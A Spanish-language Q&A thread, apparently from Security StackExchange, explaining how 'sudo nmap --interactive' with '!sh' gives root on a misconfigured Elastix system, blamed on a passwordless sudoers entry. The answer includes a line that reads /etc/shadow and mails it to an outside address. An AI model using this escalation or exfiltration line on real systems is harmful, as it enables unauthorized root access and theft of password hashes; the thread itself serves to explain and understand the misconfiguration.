¿Cómo funciona esta vulnerabilidad de escalada de privilegios en Elastix?

2

Aquí hay una vulnerabilidad de escalada de privilegios en Elastix:

# id
# uid=100(name) gid=101(name)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

¿Cómo podría un usuario normal iniciar nmap con el privilegio sudo? ¿Qué es exactamente mal configurado aquí?

Fuente: enlace

    
pregunta ramailo sathi 10.05.2016 - 21:02
fuente

1 respuesta

3

La configuración errónea provendría de un grupo o de una entrada de usuario en sudoers.conf . Este es el archivo que controla quién puede hacer qué (con respecto al sudo). En este caso, a juzgar por sus comandos (si no se editaron), el archivo sudoers contiene una entrada para que el usuario asterisco ejecute el comando sudo sin ingresar una contraseña.

Ahora, en el caso de nmap --interactive , se eliminó hace algún tiempo. Hubo un truco de escape que alguien podría usar mientras estaba en nmap para abusar del sistema. Por ejemplo:

nmap> !head -n1 /etc/shadow | mail -s shadow [email protected]
    
respondido por el munkeyoto 10.05.2016 - 21:27
fuente

Lea otras preguntas en las etiquetas